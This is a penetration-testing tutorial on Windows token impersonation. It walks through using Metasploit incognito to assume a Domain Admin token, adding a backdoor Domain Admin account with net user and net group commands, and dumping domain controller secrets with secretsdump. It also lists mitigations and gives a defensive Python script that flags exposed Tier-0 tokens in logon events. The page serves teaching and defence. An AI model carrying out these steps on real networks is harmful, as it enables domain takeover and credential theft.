Token Impersonation
Overview
Access tokens are objects that Windows creates at logon to describe a security context (the user's SID, group memberships and privileges). Every process and thread carries one, and the operating system checks the token instead of asking for credentials again each time a resource such as a file is accessed.
Token Types
Delegate: created by interactive logons, for example logging on at the console or over RDP. A delegate-level token can be used to authenticate to other hosts on the network, which is what makes it valuable to an attacker.
Impersonation: created by non-interactive logons such as mapping a network drive or running a domain logon script. An impersonation-level token only works on the local machine.
This becomes dangerous when a Domain Administrator has logged on to the compromised machine and the token is still resident, i.e. the session or a process started under it is still alive. An attacker who can reach that token can act as the Domain Admin without knowing the password. The most common and easiest way to do this is Metasploit's Incognito extension, which enumerates the tokens present on the host from a Meterpreter session and lets you impersonate one. Once impersonating the Domain Admin, we can add a new user to the Domain Admins group and keep it as a backdoor into the domain for follow-on attacks such as running secretsdump against the Domain Controller.
For the attack to work, the compromised account must be a Local Administrator (or SYSTEM) on the host, or otherwise hold the privileges needed to impersonate tokens (SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege); enumerating other users' tokens across processes requires administrative access.
Token Impersonation Attack via Metasploit
Inside the existing Meterpreter session: load the incognito extension, list the tokens available on the host (list_tokens -u for user tokens, list_tokens -g for group tokens), and impersonate the Domain Admin's delegate token with impersonate_token. Confirm the new context with getuid before going further.
Create a backdoor Domain Admin user: from the impersonated context, add a new domain account and put it in the Domain Admins group (net user with /add /domain, then net group "Domain Admins" with /add /domain). rev2self drops the impersonation afterwards.
Secretsdump on the Domain Controller: authenticate as the new account with Impacket's secretsdump.py against the DC to dump the NTDS.dit secrets, including the krbtgt hash, which allows further attacks such as Golden Tickets.
Mitigation
Limit which users and groups hold token-related privileges (SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeDebugPrivilege); only service accounts that genuinely need to impersonate clients should have them.
Account tiering: Domain Admins (Tier 0) only ever log on to Domain Controllers and other Tier-0 systems, so their delegate tokens never reside on workstations or member servers that a lower tier can compromise.
Local Administrator restrictions: keep local admin group membership on workstations minimal and use unique local admin passwords (for example LAPS), since local admin on the host is what lets an attacker reach other users' tokens in the first place.
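The following is an added example, not part of the original page: it ties the token-type list above to the account-tiering mitigation by classifying Security event 4624 logons by the kind of token they leave on the host and flagging Tier-0 accounts that have left delegate-level tokens on hosts outside Tier 0. The event lines, host names (WS-FIN-07, DC01, WS-HR-02) and account names (jdoe, da_backup) are constructed for illustration; the flattened key=value layout is a stand-in for the fields carried in a real 4624 event body.

```python
import re
from collections import defaultdict

# Security event 4624 logon types and the kind of token they leave behind.
# Interactive-style logons (console, RDP, cached credentials) create
# delegate-level tokens usable against other hosts; network logons (mapped
# drives, logon scripts) create impersonation-level tokens that are only
# usable locally.  Types not listed here are reported as "other".
LOGON_TYPES = {
    2: ("Interactive", "delegation"),
    3: ("Network", "impersonation"),
    10: ("RemoteInteractive", "delegation"),
    11: ("CachedInteractive", "delegation"),
}

# Constructed sample events (not real logs).  4625 is a failed logon and
# must be ignored; the rest are successful logons on three hosts.
SAMPLE_EVENTS = """\
2024-05-01T08:02:11Z host=WS-FIN-07 EventID=4624 TargetUserName=jdoe TargetDomainName=CORP LogonType=2
2024-05-01T08:15:40Z host=WS-FIN-07 EventID=4624 TargetUserName=da_backup TargetDomainName=CORP LogonType=10
2024-05-01T08:16:02Z host=WS-FIN-07 EventID=4624 TargetUserName=da_backup TargetDomainName=CORP LogonType=3
2024-05-01T08:20:19Z host=DC01 EventID=4624 TargetUserName=da_backup TargetDomainName=CORP LogonType=2
2024-05-01T09:01:55Z host=WS-HR-02 EventID=4625 TargetUserName=da_backup TargetDomainName=CORP LogonType=2
2024-05-01T09:30:00Z host=WS-HR-02 EventID=4624 TargetUserName=da_backup TargetDomainName=CORP LogonType=11
"""

EVENT_RE = re.compile(
    r"host=(?P<host>\S+) EventID=(?P<event_id>\d+) TargetUserName=(?P<user>\S+) "
    r"TargetDomainName=(?P<domain>\S+) LogonType=(?P<logon_type>\d+)"
)


def parse_events(text):
    """Yield one dict per successful logon (4624); other events are skipped."""
    for line in text.splitlines():
        m = EVENT_RE.search(line)
        if not m or m.group("event_id") != "4624":
            continue
        logon_type = int(m.group("logon_type"))
        name, level = LOGON_TYPES.get(logon_type, ("Type%d" % logon_type, "other"))
        yield {
            "host": m.group("host"),
            "user": m.group("user"),
            "domain": m.group("domain"),
            "logon_type": name,
            "token": level,
        }


def tokens_per_host(text):
    """Map (host, user) -> set of token levels that user has created there.

    This is the defender's view of what incognito's list_tokens would show
    an attacker on each host, assuming the sessions are still alive.
    """
    seen = defaultdict(set)
    for ev in parse_events(text):
        seen[(ev["host"], ev["user"])].add(ev["token"])
    return dict(seen)


def find_exposed_tokens(text, tier0_accounts, tier0_hosts):
    """Return (host, user, logon type) for every delegate-level token a
    Tier-0 account has left on a host outside Tier 0.  Impersonation-level
    tokens from network logons are not reported: they cannot be used to
    reach other hosts, so they do not break the tiering model."""
    hits = []
    for ev in parse_events(text):
        if (ev["user"] in tier0_accounts
                and ev["host"] not in tier0_hosts
                and ev["token"] == "delegation"):
            hits.append((ev["host"], ev["user"], ev["logon_type"]))
    return hits


if __name__ == "__main__":
    # da_backup is a Domain Admin (Tier 0); DC01 is the only Tier-0 host.
    for host, user, how in find_exposed_tokens(SAMPLE_EVENTS, {"da_backup"}, {"DC01"}):
        print("tiering violation: %s holds a delegate token for %s (%s logon)" % (host, user, how))
```

Run against real data, the same logic applies to 4624 events pulled from a SIEM; the interesting output is every workstation or member server on which a Domain Admin has a delegate token, because each of those is a host where the attack described above would succeed.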